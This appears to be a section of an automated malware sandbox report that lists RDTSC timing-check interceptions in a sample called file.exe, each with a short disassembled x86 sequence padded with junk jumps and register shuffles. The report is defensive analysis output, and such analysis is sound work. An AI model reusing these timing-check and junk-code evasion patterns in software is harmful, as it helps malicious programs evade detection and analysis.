          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0794 second address: 49B0821 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 mov esi, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov esi, 3304CA6Fh 0x00000011 pushfd 0x00000012 jmp 00007F0820DCC6B4h 0x00000017 and si, 1E98h 0x0000001c jmp 00007F0820DCC6ABh 0x00000021 popfd 0x00000022 popad 0x00000023 mov dword ptr [esp], ebp 0x00000026 pushad 0x00000027 movzx esi, dx 0x0000002a jmp 00007F0820DCC6B1h 0x0000002f popad 0x00000030 mov ebp, esp 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007F0820DCC6B3h 0x0000003b or eax, 52AC9CBEh 0x00000041 jmp 00007F0820DCC6B9h 0x00000046 popfd 0x00000047 pushad 0x00000048 popad 0x00000049 popad 0x0000004a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0821 second address: 49B0827 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0827 second address: 49B082B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B082B second address: 49B0851 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0821212AF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0851 second address: 49B0864 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0820DCC6AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0864 second address: 49B08D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F0821212AEDh 0x00000010 or eax, 2BD019B6h 0x00000016 jmp 00007F0821212AF1h 0x0000001b popfd 0x0000001c pushad 0x0000001d call 00007F0821212AEEh 0x00000022 pop ecx 0x00000023 pushfd 0x00000024 jmp 00007F0821212AEBh 0x00000029 and esi, 62B806EEh 0x0000002f jmp 00007F0821212AF9h 0x00000034 popfd 0x00000035 popad 0x00000036 popad 0x00000037 xchg eax, ecx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B08D9 second address: 49B08DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B08DD second address: 49B08E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B08E1 second address: 49B08E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B08E7 second address: 49B0927 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edi 0x00000005 push esi 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b pushad 0x0000000c push edx 0x0000000d jmp 00007F0821212AEEh 0x00000012 pop ecx 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007F0821212AF0h 0x0000001a xchg eax, esi 0x0000001b pushad 0x0000001c call 00007F0821212AEEh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0A16 second address: 49B0A1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0A1C second address: 49B0A20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0A20 second address: 49B0A24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0A24 second address: 49B0A34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0A34 second address: 49B0A3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0A3A second address: 49B0A40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0A40 second address: 49B0A44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0A44 second address: 49B0A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F0821212BA6h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushfd 0x00000014 jmp 00007F0821212AEAh 0x00000019 jmp 00007F0821212AF5h 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0AAF second address: 49B0AC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0820DCC6B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0AC4 second address: 49B0B36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0821212AF7h 0x00000009 sub ecx, 160822DEh 0x0000000f jmp 00007F0821212AF9h 0x00000014 popfd 0x00000015 jmp 00007F0821212AF0h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov eax, esi 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 pushfd 0x00000023 jmp 00007F0821212AECh 0x00000028 and esi, 77756208h 0x0000002e jmp 00007F0821212AEBh 0x00000033 popfd 0x00000034 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0B36 second address: 49B0012 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0820DCC6B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jmp 00007F0820DCC6B1h 0x0000000f pop ecx 0x00000010 popad 0x00000011 pop esi 0x00000012 jmp 00007F0820DCC6B7h 0x00000017 leave 0x00000018 pushad 0x00000019 mov edx, esi 0x0000001b mov edx, eax 0x0000001d popad 0x0000001e retn 0004h 0x00000021 nop 0x00000022 cmp eax, 00000000h 0x00000025 setne al 0x00000028 xor ebx, ebx 0x0000002a test al, 01h 0x0000002c jne 00007F0820DCC6A7h 0x0000002e xor eax, eax 0x00000030 sub esp, 08h 0x00000033 mov dword ptr [esp], 00000000h 0x0000003a mov dword ptr [esp+04h], 00000000h 0x00000042 call 00007F0824B892E3h 0x00000047 mov edi, edi 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F0820DCC6ACh 0x00000052 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0012 second address: 49B0016 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0016 second address: 49B001C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B001C second address: 49B0022 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0022 second address: 49B0026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0026 second address: 49B0095 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F0821212AF4h 0x0000000e push eax 0x0000000f jmp 00007F0821212AEBh 0x00000014 xchg eax, ebp 0x00000015 jmp 00007F0821212AF6h 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F0821212AEDh 0x00000025 sbb cx, 9B86h 0x0000002a jmp 00007F0821212AF1h 0x0000002f popfd 0x00000030 mov ax, C537h 0x00000034 popad 0x00000035 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0095 second address: 49B009B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B009B second address: 49B009F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B009F second address: 49B0188 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0820DCC6AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push FFFFFFFEh 0x0000000d pushad 0x0000000e mov edi, ecx 0x00000010 popad 0x00000011 call 00007F0820DCC6A9h 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F0820DCC6B3h 0x0000001d or ecx, 7C2AD01Eh 0x00000023 jmp 00007F0820DCC6B9h 0x00000028 popfd 0x00000029 popad 0x0000002a push eax 0x0000002b jmp 00007F0820DCC6ADh 0x00000030 mov eax, dword ptr [esp+04h] 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007F0820DCC6B7h 0x0000003b sbb cx, CADEh 0x00000040 jmp 00007F0820DCC6B9h 0x00000045 popfd 0x00000046 pushfd 0x00000047 jmp 00007F0820DCC6B0h 0x0000004c jmp 00007F0820DCC6B5h 0x00000051 popfd 0x00000052 popad 0x00000053 mov eax, dword ptr [eax] 0x00000055 jmp 00007F0820DCC6B1h 0x0000005a mov dword ptr [esp+04h], eax 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0188 second address: 49B018C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B018C second address: 49B01A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0820DCC6B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B01A6 second address: 49B0208 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0821212AF1h 0x00000009 sub eax, 7DDBA686h 0x0000000f jmp 00007F0821212AF1h 0x00000014 popfd 0x00000015 movzx ecx, di 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F0821212AF4h 0x00000025 or cx, 4458h 0x0000002a jmp 00007F0821212AEBh 0x0000002f popfd 0x00000030 mov si, 350Fh 0x00000034 popad 0x00000035 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0208 second address: 49B020E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B020E second address: 49B0225 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007F0821212AE9h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0225 second address: 49B0229 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0229 second address: 49B022F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B022F second address: 49B0235 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0235 second address: 49B0239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0239 second address: 49B0248 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0248 second address: 49B0259 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0821212AEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0259 second address: 49B025F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B025F second address: 49B0263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0263 second address: 49B0267 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0267 second address: 49B028A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0821212AF5h 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B028A second address: 49B02A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0820DCC6B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B02A7 second address: 49B02AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B02AB second address: 49B02C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0820DCC6B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B03FE second address: 49B0402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0402 second address: 49B0438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, edi 0x00000006 popad 0x00000007 xchg eax, ebx 0x00000008 jmp 00007F0820DCC6B1h 0x0000000d xchg eax, esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F0820DCC6B8h 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0438 second address: 49B043E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B043E second address: 49B0444 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0444 second address: 49B0455 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c movzx ecx, di 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0455 second address: 49B045A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B045A second address: 49B046D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0821212AEFh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B046D second address: 49B0550 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0820DCC6B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d call 00007F0820DCC6ACh 0x00000012 pushad 0x00000013 popad 0x00000014 pop esi 0x00000015 pushfd 0x00000016 jmp 00007F0820DCC6B1h 0x0000001b sub cl, FFFFFFA6h 0x0000001e jmp 00007F0820DCC6B1h 0x00000023 popfd 0x00000024 popad 0x00000025 xchg eax, edi 0x00000026 pushad 0x00000027 push esi 0x00000028 mov di, 7B2Eh 0x0000002c pop edi 0x0000002d pushfd 0x0000002e jmp 00007F0820DCC6B4h 0x00000033 adc esi, 38221978h 0x00000039 jmp 00007F0820DCC6ABh 0x0000003e popfd 0x0000003f popad 0x00000040 push eax 0x00000041 pushad 0x00000042 pushad 0x00000043 call 00007F0820DCC6B0h 0x00000048 pop ecx 0x00000049 pushfd 0x0000004a jmp 00007F0820DCC6ABh 0x0000004f jmp 00007F0820DCC6B3h 0x00000054 popfd 0x00000055 popad 0x00000056 popad 0x00000057 xchg eax, edi 0x00000058 jmp 00007F0820DCC6B6h 0x0000005d mov eax, dword ptr [770E4538h] 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 mov ax, di 0x00000068 mov ecx, ebx 0x0000006a popad 0x0000006b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0550 second address: 49B0556 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0556 second address: 49B05A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0820DCC6ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [ebp-08h], eax 0x0000000e jmp 00007F0820DCC6B0h 0x00000013 xor eax, ebp 0x00000015 jmp 00007F0820DCC6B1h 0x0000001a nop 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jmp 00007F0820DCC6B3h 0x00000023 mov dx, cx 0x00000026 popad 0x00000027 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B05A9 second address: 49B05CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 6A46h 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F0821212AEAh 0x00000012 nop 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F0821212AEAh 0x0000001c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B05CF second address: 49B05D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B05D5 second address: 49B05DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B05DB second address: 49B062A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0820DCC6B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebp-10h] 0x0000000e pushad 0x0000000f jmp 00007F0820DCC6AEh 0x00000014 mov bl, al 0x00000016 popad 0x00000017 mov dword ptr fs:[00000000h], eax 0x0000001d pushad 0x0000001e mov di, 538Eh 0x00000022 mov ebx, 0B5A1A9Ah 0x00000027 popad 0x00000028 mov dword ptr [ebp-18h], esp 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e mov edx, 78AF3FC0h 0x00000033 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A045E second address: 49A046D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0821212AEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A046D second address: 49A0473 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0473 second address: 49A048B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0821212AEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A048B second address: 49A048F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A048F second address: 49A04AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0821212AF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A04AA second address: 49A04E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0820DCC6B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0820DCC6B1h 0x0000000f nop 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A04E0 second address: 49A04E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0531 second address: 49A0574 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 pushfd 0x00000007 jmp 00007F0820DCC6B0h 0x0000000c add eax, 34AFD3C8h 0x00000012 jmp 00007F0820DCC6ABh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b js 00007F0820DCC73Ah 0x00000021 pushad 0x00000022 mov dx, ax 0x00000025 mov di, cx 0x00000028 popad 0x00000029 cmp dword ptr [ebp-14h], edi 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0574 second address: 49A0578 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0578 second address: 49A057E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A057E second address: 49A0583 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0583 second address: 49A05B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F0820DCC6AAh 0x0000000a jmp 00007F0820DCC6B5h 0x0000000f popfd 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jne 00007F08934BA596h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A05B7 second address: 49A05BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A05BB second address: 49A05CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0820DCC6AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A05CE second address: 49A05E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0821212AF4h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A05E6 second address: 49A0606 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0820DCC6ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebx, dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov ebx, 1D804906h 0x00000016 movsx edx, si 0x00000019 popad 0x0000001a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0606 second address: 49A0630 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 movsx ebx, ax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c lea eax, dword ptr [ebp-2Ch] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0821212AF9h 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0630 second address: 49A0640 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0820DCC6ACh 0x00000009 rdtsc
